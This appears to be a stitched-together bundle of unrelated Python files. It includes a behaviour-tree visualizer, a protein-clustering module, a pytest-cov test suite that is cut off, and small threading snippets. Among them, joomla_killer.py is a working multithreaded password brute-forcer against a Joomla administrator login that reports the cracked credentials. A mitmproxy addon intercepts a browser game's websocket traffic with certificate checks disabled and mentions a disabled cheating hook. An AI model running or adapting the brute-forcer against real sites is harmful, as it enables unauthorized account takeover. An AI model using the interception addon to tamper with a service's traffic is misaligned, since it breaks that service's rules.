# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import shutil
import tempfile
import threading
import time
import webbrowser
from bt_learning.learning_from_demo.render_tree import dot_graph
import py_trees as pt
class BTVisualizer:
"""Render the BT in a web browser and allows ticking the tree manually."""
# This works only in Windows!!
CHROME_PATH = r'C:\Program Files\Google\Chrome\Application\chrome.exe'
DISPLAY_HTML = '<!DOCTYPE html>\
<html>\
<head>\
<meta charset="utf-8" />\
<title>DEBUG BT</title>\
<script language="JavaScript">\
function refreshIt(element) {\
setTimeout(function () {\
element.src = element.src.split("?")[0] + "?" +\
new Date().getTime();\
}, 100);\
}\
</script>\
</head>\
<body>\
<img src="tree.svg" onload="refreshIt(this)"/>\
</body>\
</html>'
def __init__(self, tree):
if isinstance(tree, pt.trees.BehaviourTree):
self.tree = tree.root
else:
self.tree = tree
self.temp_dir = tempfile.mkdtemp()
self.html_document = os.path.join(self.temp_dir, 'bt_debug.html')
self.svg_document = os.path.join(self.temp_dir, 'tree.svg')
dot_graph(self.tree, True).write_svg(self.svg_document, encoding='utf8')
with open(self.html_document, 'w') as f:
f.write(self.DISPLAY_HTML)
self.__thread = threading.Thread(target=self.__open_browser)
self.__thread.start()
def __open_browser(self):
if not webbrowser.get(f'"{self.CHROME_PATH}" %s').open('file://' + self.html_document):
webbrowser.open('file://' + self.html_document)
def __del__(self):
while os.path.isdir(self.temp_dir):
try:
f = open(self.svg_document, encoding='utf8')
f.close()
shutil.rmtree(self.temp_dir)
except IOError:
pass
def tick(self) -> pt.common.Status:
"""Tick the tree once and display its status."""
self.tree.tick_once()
self.update_graph()
return self.tree.status
def tick_interactive(self):
"""
Block until the tree returns SUCCESS.
It Lets the user tick the tree by pressing enter in the console.
"""
while self.tree.status != pt.common.Status.SUCCESS:
input('Press ENTER to tick tree')
self.tick()
def requires_manual_closing(self) -> bool:
"""Return if this object requires that the browser is closed manually."""
return self.__thread.is_alive()
def update_graph(self):
"""Update the visualized graph."""
dot_graph(self.tree, True).write_svg(self.svg_document, encoding='utf8')
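# Usage sketch (hypothetical, not part of the original module); assumes a
# py_trees behaviour tree `tree` has already been built elsewhere:
#
#   visualizer = BTVisualizer(tree)
#   visualizer.tick_interactive()   # press ENTER in the console to tick until SUCCESS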
|
software_engineering_threading2.py
|
import threading
def appstart():
    print('Start your dev_appserver')
# Do operations
def coveragestart():
    print('Start your coverage')
# Do operations
t = threading.Thread(name='start', target=appstart)
w = threading.Thread(name='stop', target=coveragestart)
t.start()
w.start()
w.join()  # note that coveragestart is joined first; join order only changes the order the main thread waits, not which thread finishes first
t.join()
|
cluster_filter.py
|
import pandas as pd
import numpy as np
import itertools
import shlex
import subprocess
import os, sys
import threading
import signal
import time
sys.path.insert(0, os.path.dirname(os.path.abspath(os.path.realpath(__file__))))
import variables
class TimeOutException(BaseException):
pass
# filename = '{}.pid'.format(os.getpid())
# filename = '{}_pid'.format(os.getpid())
class MCL(object):
def __init__(self, SESSION_FOLDER_ABSOLUTE, max_timeout):
# self.set_fh_log(os.path.dirname(os.getcwd()) + r'/data/mcl/mcl_log.txt')
# self.abs_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) + r'/data/mcl/'
# self.set_fh_log(self.abs_path + 'mcl_log.txt')
self.abs_path = SESSION_FOLDER_ABSOLUTE
self.set_fh_log(os.path.join(self.abs_path, 'mcl_log.txt'))
self.max_timeout = max_timeout * 60
# print("#"*80)
# print("2. max_timeout {}".format(max_timeout))
def set_fh_log(self, log_fn):
self.fh_log = open(log_fn, "a")
def get_fh_log(self):
return self.fh_log
def close_log(self):
# self.get_fh_log().flush()
self.get_fh_log().close()
    def jaccard_index_ans_setA2B(self, ans_set1, ans_set2):
        """Jaccard index of two AN sets: |intersection| / |union|."""
        union_size = len(ans_set1 | ans_set2)
        if union_size == 0:
            return 0.0
        return float(len(ans_set1 & ans_set2)) / union_size
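    # Worked example (illustrative values): for {"P1", "P2", "P3"} and
    # {"P2", "P3", "P4"} the intersection has 2 elements and the union 4,
    # so the Jaccard index is 2/4 = 0.5.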
def write_JaccardIndexMatrix(self, fn_results, fn_out): #!!! profile this function
"""
expects a DataFrame with a 'ANs_foreground' column,
calculates the Jaccard Index for all
combinations of AN sets.
:param fn_results: String
:param fn_out: rawString
:return: None
"""
df = pd.read_csv(fn_results, sep='\t')
func = lambda x: set(x.split(", "))
df["ANs_foreground_set"] = map(func, df["ANs_foreground"])
index_of_col = df.columns.tolist().index("ANs_foreground_set")
df_ans_foreground_set = df.values[:, index_of_col]
with open(fn_out, 'w') as fh:
for combi in itertools.combinations(df.index, 2):
c1, c2 = combi
ans_set1 = df_ans_foreground_set[c1]
ans_set2 = df_ans_foreground_set[c2]
ji = self.jaccard_index_ans_setA2B(ans_set1, ans_set2)
line2write = str(c1) + '\t' + str(c2) + '\t' + str(ji) + '\n'
fh.write(line2write)
def results2list_of_sets(self, fn_results):
with open(fn_results, 'r') as fh:
lines_split = [ele.strip().split('\t') for ele in fh]
ANs_foreground_index = lines_split[0].index("ANs_foreground")
return [set(row[ANs_foreground_index].split(', ')) for row in lines_split[1:]]
def write_JaccardIndexMatrix_speed(self, fn_results, fn_out):
list_of_sets = self.results2list_of_sets(fn_results)
with open(fn_out, 'w') as fh:
for combi in itertools.combinations(range(0, len(list_of_sets)), 2):
c1, c2 = combi
ans_set1 = list_of_sets[c1]
ans_set2 = list_of_sets[c2]
                union_size = len(ans_set1 | ans_set2)
                if union_size == 0:
                    ji = 0.0
                else:
                    ji = len(ans_set1 & ans_set2) * 1.0 / union_size
line2write = str(c1) + '\t' + str(c2) + '\t' + str(ji) + '\n'
fh.write(line2write)
def mcl_cluster2file(self, mcl_in, inflation_factor, mcl_out):
# print("MCL max_timeout:", self.max_timeout)
# cmd_text = """mcl %s -I %d --abc -o %s""" % (mcl_in, inflation_factor, mcl_out)
cmd_text = """mcl {} -I {} --abc -o {}""".format(mcl_in, inflation_factor, mcl_out)
# print("#"*80)
# print("MCL: ", cmd_text)
# print("#" * 80)
args = shlex.split(cmd_text)
#ph = subprocess.Popen(args, stdin=None, stdout=self.get_fh_log(), stderr=self.get_fh_log())
# self.pid = ph.pid
class my_process(object):
# hack to get a namespace
def open(self, args, **kwargs):
ph = subprocess.Popen(args, **kwargs)
self.process = ph
self.pid = ph.pid
ph.wait()
kwargs = {"stdin" : None,
"stdout" : self.get_fh_log(),
"stderr" : self.get_fh_log()}
p = my_process()
t = threading.Thread(target=p.open, args=(args,), kwargs=kwargs)
t.start()
self.get_fh_log().flush()
# wait for max_time, kill or return depending on time
# is_alive = False
for time_passed in range(1, self.max_timeout + 1):
time.sleep(1)
            if not t.is_alive():
                break
        if t.is_alive():
os.kill(p.pid, signal.SIGKILL)
raise TimeOutException("MCL took too long and was killed:")
        # In Python 3, Popen.wait (and subprocess.run) accept a ``timeout``
        # argument, which would make the polling loop above unnecessary.
# return ph.wait();
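    # Minimal sketch (not part of the original workflow) of the Python 3
    # alternative hinted at above; assumes Python 3 and an ``mcl`` binary on
    # the PATH, and reuses this class's log file handle and timeout.
    def mcl_cluster2file_py3_sketch(self, mcl_in, inflation_factor, mcl_out):
        cmd_text = "mcl {} -I {} --abc -o {}".format(mcl_in, inflation_factor, mcl_out)
        args = shlex.split(cmd_text)
        try:
            # run() kills the child and re-raises TimeoutExpired when the
            # timeout (in seconds) expires; check=True raises on a non-zero exit.
            subprocess.run(args, stdout=self.get_fh_log(), stderr=self.get_fh_log(),
                           timeout=self.max_timeout, check=True)
        except subprocess.TimeoutExpired:
            raise TimeOutException("MCL took too long and was killed")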
def get_clusters(self, mcl_out):
"""
parse MCL output
returns nested list of integers
[
[1, 3, 4],
[2, 5]
]
:param mcl_out: rawFile
:return: ListOfListOfIntegers
"""
cluster_list = []
with open(mcl_out, 'r') as fh:
for line in fh:
cluster_list.append([int(ele) for ele in line.strip().split('\t')])
return cluster_list
def calc_MCL_get_clusters(self, session_id, fn_results, inflation_factor):
mcl_in = os.path.join(self.abs_path, 'mcl_in') + session_id + '.txt'
mcl_out = os.path.join(self.abs_path, 'mcl_out') + session_id + '.txt'
if not os.path.isfile(mcl_in):
self.write_JaccardIndexMatrix_speed(fn_results, mcl_in)
self.mcl_cluster2file(mcl_in, inflation_factor, mcl_out)
self.close_log()
return self.get_clusters(mcl_out)
# class Filter(object):
#
# def __init__(self):
# self.blacklist = set(variables.blacklisted_terms)
# self.go_lineage_dict = {}
# # key=GO-term, val=set of GO-terms
# # for go_term_name in go_dag:
# # GOTerm_instance = go_dag[go_term_name]
# # self.go_lineage_dict[go_term_name] = GOTerm_instance.get_all_parents().union(GOTerm_instance.get_all_children())
#
# # self.lineage_dict = {} # in query
# # # key=GO-term, val=set of GO-terms (parents)
# # for go_term_name in go_dag:
# # GOTerm_instance = go_dag[go_term_name]
# # self.lineage_dict[go_term_name] = GOTerm_instance.get_all_parents().union(GOTerm_instance.get_all_children())
# # for term_name in upk_dag:
# # Term_instance = upk_dag[term_name]
# # self.lineage_dict[term_name] = Term_instance.get_all_parents().union(Term_instance.get_all_children())
#
# def filter_term_lineage(self, header, results, indent, sort_on='p_uncorrected'): #'fold_enrichment_foreground_2_background'
# """
# produce reduced list of results
# from each GO-term lineage (all descendants (children) and ancestors
# (parents), but not 'siblings') pick the term with the lowest p-value.
# :param header: String
# :param results: ListOfString
# :param indent: Bool
# :param sort_on: String(one of 'p_uncorrected' or 'fold_enrichment_foreground_2_background')
# :return: ListOfString
# """
# results_filtered = []
# blacklist = set(["GO:0008150", "GO:0005575", "GO:0003674"])
# # {"BP": "GO:0008150", "CP": "GO:0005575", "MF": "GO:0003674"}
# header_list = header.split('\t') #!!!
# index_p = header_list.index(sort_on)
# index_go = header_list.index('id_')
# results = [res.split('\t') for res in results]
# # results sorted on p_value
# results.sort(key=lambda x: float(x[index_p]))
# if sort_on == "fold_enrichment_foreground_2_background":
# results = results[::-1]
# for res in results:
# if indent:
# dot_goterm = res[index_go]
# goterm = dot_goterm[dot_goterm.find("GO:"):]
# if not goterm in blacklist:
# results_filtered.append(res)
# blacklist = blacklist.union(self.go_lineage_dict[goterm])
# else:
# if not res[index_go] in blacklist:
# results_filteread.append(res)
# blacklist = blacklist.union(self.go_lineage_dict[res[index_go]])
# return ["\t".join(res) for res in results_filtered]
def filter_parents_if_same_foreground_v4(df_orig, lineage_dict, blacklisted_terms, entity_types_with_ontology):
"""
sorting on p-values will not be necessary if the foreground is the same since foreground_count and
foreground_n is equal and therefore
:param df_orig:
:param lineage_dict:
:param blacklisted_terms:
:param entity_types_with_ontology:
:return:
"""
blacklisted_terms = set(blacklisted_terms)
cond_df_2_filter = df_orig["etype"].isin(entity_types_with_ontology)
df = df_orig[cond_df_2_filter]
df_no_filter = df_orig[~cond_df_2_filter]
terms_reduced = []
for name, group in df.groupby("foreground_ids"):
for term in group.sort_values(["hierarchical_level", "p_value", "foreground_count"], ascending=[False, True, False])["term"].values:
if not term in blacklisted_terms:
terms_reduced.append(term)
blacklisted_terms = blacklisted_terms.union(lineage_dict[term])
df = df[df["term"].isin(terms_reduced)]
return pd.concat([df, df_no_filter], sort=False)
def filter_parents_if_same_foreground(df_orig, functerm_2_level_dict):
"""
keep terms of lowest leaf, remove parent terms if they are associated with exactly the same foreground
:param df_orig: DataFrame
:param functerm_2_level_dict: Dict(key: String(functional term), val: Integer(Level of hierarchy))
:return: DataFrame
"""
cond_df_2_filter = df_orig["etype"].isin(variables.entity_types_with_ontology)
df = df_orig[cond_df_2_filter]
df["level"] = df["id"].apply(lambda term: functerm_2_level_dict[term])
# get maximum within group, all rows included if ties exist, NaNs are False in idx
idx = df.groupby(["etype", "ANs_foreground"])["level"].transform(max) == df["level"]
# retain rows where level is NaN
indices_2_keep = df[(df["level"].isnull() | idx)].index.values
# add df_orig part that can't be filtered due to missing ontology
indices_2_keep = np.append(df_orig[~cond_df_2_filter].index.values, indices_2_keep)
return df_orig.loc[indices_2_keep]
#return df_orig.loc[set(indices_2_keep)]
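# Illustrative example (hypothetical data): if a child term at hierarchy level 5
# and its parent at level 3 are both associated with exactly the same foreground
# accessions, only the deeper (level 5) term survives the filter; rows whose
# level is NaN (no ontology) are always retained.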
def filter_parents_if_same_foreground_v2(df_orig):
### filter blacklisted GO and KW terms
df_orig = df_orig[~df_orig["term"].isin(variables.blacklisted_terms)]
cond_df_2_filter = df_orig["etype"].isin(variables.entity_types_with_ontology)
df = df_orig[cond_df_2_filter]
df_no_filter = df_orig[~cond_df_2_filter]
# get maximum within group, all rows included if ties exist, NaNs are False in idx
idx = df.groupby(["etype", "foreground_ids"])["hierarchical_level"].transform(max) == df["hierarchical_level"]
# retain rows where level is NaN
df = df[(df["hierarchical_level"].isnull() | idx)]
# add df_orig part that can't be filtered due to missing ontology
return pd.concat([df, df_no_filter], sort=False)
def get_header_results(fn):
results = []
with open(fn, 'r') as fh:
for line in fh:
res2append = line.strip().split('\t')
if len(res2append) > 1:
results.append(res2append)
header = results[0]
results = results[1:]
return header, results
if __name__ == "__main__":
############################################################################
##### PROFILING MCL
# data=GO-terms yeast default
SESSION_FOLDER_ABSOLUTE = r'/Users/dblyon/modules/cpr/agotool/static/data/session/'
mcl = MCL(SESSION_FOLDER_ABSOLUTE, max_timeout=1)
# session_id = "_5581_1438333013.92"
# session_id = '_6027_1440960988.55'
# session_id = '_6029_1440960996.93'
session_id = '_31830_1447841531.11'
# results_orig_31830_1447841531.11.tsv
inflation_factor = 2.0
fn_results_orig_absolute = os.path.join(SESSION_FOLDER_ABSOLUTE, ("results_orig" + session_id + ".tsv"))
cluster_list = mcl.calc_MCL_get_clusters(session_id, fn_results_orig_absolute, inflation_factor)
############################################################################
# A4D212 no description
# A4D212
# mcl = MCL_no_input_file_pid()
# header, results = get_header_results(r'/Users/dblyon/modules/cpr/goterm/agotool/static/data/mcl/MCL_test.txt')
# cluster_list = mcl.calc_MCL_get_clusters(header, results, inflation_factor=2.0)
# print cluster_list
# fn = r'/Users/dblyon/modules/cpr/goterm/mcl/Yeast_Acetyl_vs_AbCorr_UPK.txt'
# mcl_in = 'mcl_in.txt'
# df = pd.read_csv(fn, sep='\t')
# mcl = MCL()
# mcl.write_JaccardIndexMatrix(df, mcl_in)
# mcl_out = mcl_in.replace('_in.txt', '_out.txt')
# inflation_factor = 2.0
# mcl.mcl_cluster2file(mcl_in, inflation_factor, mcl_out)
# cluster_list = mcl.get_clusters(mcl_out)
# fn = r'/Users/dblyon/modules/cpr/goterm/mcl/Yeast_Acetyl_vs_AbCorr_UPK.txt'
# mcl = MCL()
# cluster_list = mcl.calc_MCL_get_clusters(fn, inflation_factor=2.0)
|
addons.py
|
# -*- coding: utf-8 -*-
# Listen to websocket traffic and expose the captured packets to other programs via XML-RPC
import os
from selenium.webdriver.chrome.options import Options
from selenium import webdriver
import threading
import pickle
import mitmproxy.addonmanager
import mitmproxy.connections
import mitmproxy.http
import mitmproxy.log
import mitmproxy.tcp
import mitmproxy.websocket
import mitmproxy.proxy.protocol
from xmlrpc.server import SimpleXMLRPCServer
from liqi import tamperUsetime,LiqiProto
activated_flows = [] # store all flow.id ([-1] is the recently opened)
messages_dict = dict() # flow.id -> List[flow_msg]
liqi = LiqiProto()
class ClientWebSocket:
def __init__(self):
pass
# Websocket lifecycle
def websocket_handshake(self, flow: mitmproxy.http.HTTPFlow):
"""
Called when a client wants to establish a WebSocket connection. The
WebSocket-specific headers can be manipulated to alter the
handshake. The flow object is guaranteed to have a non-None request
attribute.
"""
print('[handshake websocket]:',flow,flow.__dict__,dir(flow))
def websocket_start(self, flow: mitmproxy.websocket.WebSocketFlow):
"""
A websocket connection has commenced.
"""
print('[new websocket]:',flow,flow.__dict__,dir(flow))
global activated_flows,messages_dict
activated_flows.append(flow.id)
messages_dict[flow.id]=flow.messages
def websocket_message(self, flow: mitmproxy.websocket.WebSocketFlow):
"""
Called when a WebSocket message is received from the client or
server. The most recent message will be flow.messages[-1]. The
message is user-modifiable. Currently there are two types of
messages, corresponding to the BINARY and TEXT frame types.
"""
flow_msg = flow.messages[-1]
# This is cheating, extending the time limit to 7 seconds
#tamperUsetime(flow_msg)
#result = liqi.parse(flow_msg)
#print(result)
#print('-'*65)
packet = flow_msg.content
from_client = flow_msg.from_client
print("[" + ("Sended" if from_client else "Reveived") +
"] from '"+flow.id+"': decode the packet here: %r…" % packet)
def websocket_error(self, flow: mitmproxy.websocket.WebSocketFlow):
"""
A websocket connection has had an error.
"""
print("websocket_error, %r" % flow)
def websocket_end(self, flow: mitmproxy.websocket.WebSocketFlow):
"""
A websocket connection has ended.
"""
print('[end websocket]:',flow,flow.__dict__,dir(flow))
global activated_flows,messages_dict
activated_flows.remove(flow.id)
messages_dict.pop(flow.id)
addons = [
ClientWebSocket()
]
# Functions exposed over XML-RPC
def get_len() -> int:
global activated_flows,messages_dict
L=messages_dict[activated_flows[-1]]
return len(L)
def get_item(id: int):
global activated_flows,messages_dict
L=messages_dict[activated_flows[-1]]
return pickle.dumps(L[id])
def get_items(from_: int, to_: int):
global activated_flows,messages_dict
L=messages_dict[activated_flows[-1]]
return pickle.dumps(L[from_:to_:])
def RPC_init():
server = SimpleXMLRPCServer(('localhost', 37247))
server.register_function(get_len, "get_len")
server.register_function(get_item, "get_item")
server.register_function(get_items, "get_items")
print("RPC Server Listening on 127.0.0.1:37247 for Client.")
server.serve_forever()
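# Usage sketch for the consumer side (hypothetical, not part of this addon);
# assumes the XML-RPC server above is reachable on localhost:37247.
def example_rpc_client():
    from xmlrpc.client import ServerProxy
    proxy = ServerProxy('http://localhost:37247')
    n = proxy.get_len()                     # number of frames in the latest flow
    if n:
        # get_item returns a pickled websocket message wrapped in an xmlrpc Binary
        last_msg = pickle.loads(proxy.get_item(n - 1).data)
        print(n, last_msg)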
RPC_server = threading.Thread(target=RPC_init)
RPC_server.start()
# open chrome and liqi
chrome_options = Options()
chrome_options.add_argument('--proxy-server=127.0.0.1:8080')
chrome_options.add_argument('--ignore-certificate-errors')
browser = webdriver.Chrome(chrome_options=chrome_options)
#browser.get('https://www.majsoul.com/1/')
if __name__=='__main__':
    # Replay recorded websocket traffic
replay_path=os.path.join(os.path.dirname(__file__), 'websocket_frames.pkl')
history_msg = pickle.load(open(replay_path, 'rb'))
activated_flows = ['fake_id']
messages_dict = {'fake_id':history_msg}
|
joomla_killer.py
|
import http.cookiejar
import queue
import threading
import urllib.error
import urllib.parse
import urllib.request
from abc import ABC
from html.parser import HTMLParser
# general settings
user_thread = 10
username = "admin"
wordlist_file = "INSERT-WORDLIST"
resume = None
# target specific settings
target_url = "http://192.168.1.3/administrator/index.php"
target_post = "http://192.168.1.3/administrator/index.php"
username_field = "username"
password_field = "passwd"
success_check = "Administration - Control Panel"
class BruteParser(HTMLParser, ABC):
def __init__(self):
HTMLParser.__init__(self)
self.tag_results = {}
def handle_starttag(self, tag, attrs):
if tag == "input":
tag_name = None
for name, value in attrs:
if name == "name":
tag_name = value
if tag_name:
self.tag_results[tag_name] = value
class Bruter(object):
def __init__(self, user, words_q):
self.username = user
self.password_q = words_q
self.found = False
print("Finished setting up for: %s" % user)
def run_bruteforce(self):
for i in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = http.cookiejar.FileCookieJar("cookies")
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(jar)
)
response = opener.open(target_url)
page = response.read()
print(
"Trying: %s : %s (%d left)"
% (self.username, brute, self.password_q.qsize())
)
# parse out the hidden fields
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add our username and password fields
post_tags[username_field] = self.username
post_tags[password_field] = brute
login_data = urllib.parse.urlencode(post_tags)
login_response = opener.open(target_post, login_data)
login_result = login_response.read()
if success_check in login_result:
self.found = True
print("[*] Bruteforce successful.")
print("[*] Username: %s" % username)
print("[*] Password: %s" % brute)
print("[*] Waiting for other threads to exit...")
def build_wordlist(wordlst_file):
# read in the word list
fd = open(wordlst_file, "r")
raw_words = [line.rstrip("\n") for line in fd]
fd.close()
found_resume = False
word_queue = queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
word_queue.put(word)
else:
if word == resume:
found_resume = True
print("Resuming wordlist from: %s" % resume)
else:
word_queue.put(word)
return word_queue
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce()
|
maincode_raspberrypi.py
|
#Main Code: Automated Bridge Inspection - Raspberry Pi
#Group 1, ME588
# import packages here ####################################
import multiprocessing
# import different functions needed here ##########################
# FSM ##########################################################
# inputs:
# pan = camera servo1 angle readings (output from servo pid
# tilt = camera servo2 angle readings
# patch = pushing mechanism servo 3
# ts = timer switch that begins 75 sec timer
# rd = counter for the number of times entering row d
# us1 = Ultrasonic sensor distance reading (pi pin)
def fsm(pan=None, tilt=None, patch=None, ts=None, rd=None, us1=None, us2=None, us3=None, us4=None):
    # placeholder: the state-machine logic goes here
    left_motor = right_motor = patching = state = None
    return (left_motor, right_motor, patching, state)
# leave this section at bottom
# Multiprocessing code that runs multiple processes ###################################################
# link to help explain https://pythonprogramming.net/multiprocessing-python-intermediate-python-tutorial/
if __name__ == '__main__':
for i in range(100):
p = multiprocessing.Process(target=fsm, args=())
p.start()
p.join()
|
decorators.py
|
from functools import wraps
from threading import Thread

def asynch(f):
    """Run the decorated function in a background thread ("asynch" avoids the reserved word async)."""
    @wraps(f)
    def wrapper(*args, **kwargs):
        thr = Thread(target=f, args=args, kwargs=kwargs)
        thr.start()
        return thr  # hand the thread back so callers can join() it if needed
    return wrapper
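
# Usage sketch (hypothetical example, not part of the original module): the
# decorated call returns immediately while the work runs in a background thread.
if __name__ == '__main__':
    import time

    @asynch
    def slow_greet(name):
        time.sleep(1)
        print('hello, %s' % name)

    slow_greet('world')              # returns right away
    print('main thread keeps going')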
|
test_pytest_cov.py
|
import collections
import glob
import os
import platform
import re
import subprocess
import sys
from itertools import chain
import coverage
import py
import pytest
import virtualenv
import xdist
from fields import Namespace
from process_tests import TestProcess as _TestProcess
from process_tests import dump_on_error
from process_tests import wait_for_strings
import pytest_cov.plugin
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
coverage, platform # required for skipif mark on test_cov_min_from_coveragerc
max_worker_restart_0 = "--max-worker-restart=0"
SCRIPT = '''
import sys, helper
def pytest_generate_tests(metafunc):
for i in [10]:
metafunc.parametrize('p', range(i))
def test_foo(p):
x = True
helper.do_stuff() # get some coverage in some other completely different location
if sys.version_info[0] > 5:
assert False
'''
SCRIPT2 = '''
#
def test_bar():
x = True
assert x
'''
COVERAGERC_SOURCE = '''\
[run]
source = .
'''
SCRIPT_CHILD = '''
import sys
idx = int(sys.argv[1])
if idx == 0:
foo = "a" # previously there was a "pass" here but Python 3.5 optimizes it away.
if idx == 1:
foo = "b" # previously there was a "pass" here but Python 3.5 optimizes it away.
'''
SCRIPT_PARENT = '''
import os
import subprocess
import sys
def pytest_generate_tests(metafunc):
for i in [2]:
metafunc.parametrize('idx', range(i))
def test_foo(idx):
out, err = subprocess.Popen(
[sys.executable, os.path.join(os.path.dirname(__file__), 'child_script.py'), str(idx)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
    # there is an issue in coverage.py with multiline statements at
# end of file: https://bitbucket.org/ned/coveragepy/issue/293
pass
'''
SCRIPT_PARENT_CHANGE_CWD = '''
import subprocess
import sys
import os
def pytest_generate_tests(metafunc):
for i in [2]:
metafunc.parametrize('idx', range(i))
def test_foo(idx):
os.mkdir("foobar")
os.chdir("foobar")
subprocess.check_call([
sys.executable,
os.path.join(os.path.dirname(__file__), 'child_script.py'),
str(idx)
])
    # there is an issue in coverage.py with multiline statements at
# end of file: https://bitbucket.org/ned/coveragepy/issue/293
pass
'''
SCRIPT_PARENT_CHANGE_CWD_IMPORT_CHILD = '''
import subprocess
import sys
import os
def pytest_generate_tests(metafunc):
for i in [2]:
if metafunc.function is test_foo: metafunc.parametrize('idx', range(i))
def test_foo(idx):
os.mkdir("foobar")
os.chdir("foobar")
subprocess.check_call([
sys.executable,
'-c', 'import sys; sys.argv = ["", str(%s)]; import child_script' % idx
])
    # there is an issue in coverage.py with multiline statements at
# end of file: https://bitbucket.org/ned/coveragepy/issue/293
pass
'''
SCRIPT_FUNCARG = '''
import coverage
def test_foo(cov):
assert isinstance(cov, coverage.Coverage)
'''
SCRIPT_FUNCARG_NOT_ACTIVE = '''
def test_foo(cov):
assert cov is None
'''
CHILD_SCRIPT_RESULT = '[56] * 100%'
PARENT_SCRIPT_RESULT = '9 * 100%'
DEST_DIR = 'cov_dest'
REPORT_NAME = 'cov.xml'
xdist_params = pytest.mark.parametrize('opts', [
'',
pytest.param('-n 1', marks=pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"'))
], ids=['nodist', 'xdist'])
@pytest.fixture(scope='session', autouse=True)
def adjust_sys_path():
"""Adjust PYTHONPATH during tests to make "helper" importable in SCRIPT."""
orig_path = os.environ.get('PYTHONPATH', None)
new_path = os.path.dirname(__file__)
if orig_path is not None:
new_path = os.pathsep.join([new_path, orig_path])
os.environ['PYTHONPATH'] = new_path
yield
if orig_path is None:
del os.environ['PYTHONPATH']
else:
os.environ['PYTHONPATH'] = orig_path
@pytest.fixture(params=[
('branch=true', '--cov-branch', '9 * 85%', '3 * 100%'),
('branch=true', '', '9 * 85%', '3 * 100%'),
('', '--cov-branch', '9 * 85%', '3 * 100%'),
('', '', '9 * 89%', '3 * 100%'),
], ids=['branch2x', 'branch1c', 'branch1a', 'nobranch'])
def prop(request):
return Namespace(
code=SCRIPT,
code2=SCRIPT2,
conf=request.param[0],
fullconf='[run]\n%s\n' % request.param[0],
prefixedfullconf='[coverage:run]\n%s\n' % request.param[0],
args=request.param[1].split(),
result=request.param[2],
result2=request.param[3],
)
def test_central(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script,
*prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
def test_annotate(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=annotate',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage annotated source written next to source',
'*10 passed*',
])
assert result.ret == 0
def test_annotate_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=annotate:' + DEST_DIR,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage annotated source written to dir ' + DEST_DIR,
'*10 passed*',
])
dest_dir = testdir.tmpdir.join(DEST_DIR)
assert dest_dir.check(dir=True)
assert dest_dir.join(script.basename + ",cover").check()
assert result.ret == 0
def test_html(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=html',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage HTML written to dir htmlcov',
'*10 passed*',
])
dest_dir = testdir.tmpdir.join('htmlcov')
assert dest_dir.check(dir=True)
assert dest_dir.join("index.html").check()
assert result.ret == 0
def test_html_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=html:' + DEST_DIR,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage HTML written to dir ' + DEST_DIR,
'*10 passed*',
])
dest_dir = testdir.tmpdir.join(DEST_DIR)
assert dest_dir.check(dir=True)
assert dest_dir.join("index.html").check()
assert result.ret == 0
def test_term_report_does_not_interact_with_html_output(testdir):
script = testdir.makepyfile(test_funcarg=SCRIPT_FUNCARG)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing:skip-covered',
'--cov-report=html:' + DEST_DIR,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage HTML written to dir ' + DEST_DIR,
'*1 passed*',
])
dest_dir = testdir.tmpdir.join(DEST_DIR)
assert dest_dir.check(dir=True)
assert sorted(dest_dir.visit("**/*.html")) == [dest_dir.join("index.html"), dest_dir.join("test_funcarg_py.html")]
assert dest_dir.join("index.html").check()
assert result.ret == 0
def test_html_configured_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[html]
directory = somewhere
""")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=html',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage HTML written to dir somewhere',
'*10 passed*',
])
dest_dir = testdir.tmpdir.join('somewhere')
assert dest_dir.check(dir=True)
assert dest_dir.join("index.html").check()
assert result.ret == 0
def test_xml_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=xml:' + REPORT_NAME,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage XML written to file ' + REPORT_NAME,
'*10 passed*',
])
assert testdir.tmpdir.join(REPORT_NAME).check()
assert result.ret == 0
def test_term_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
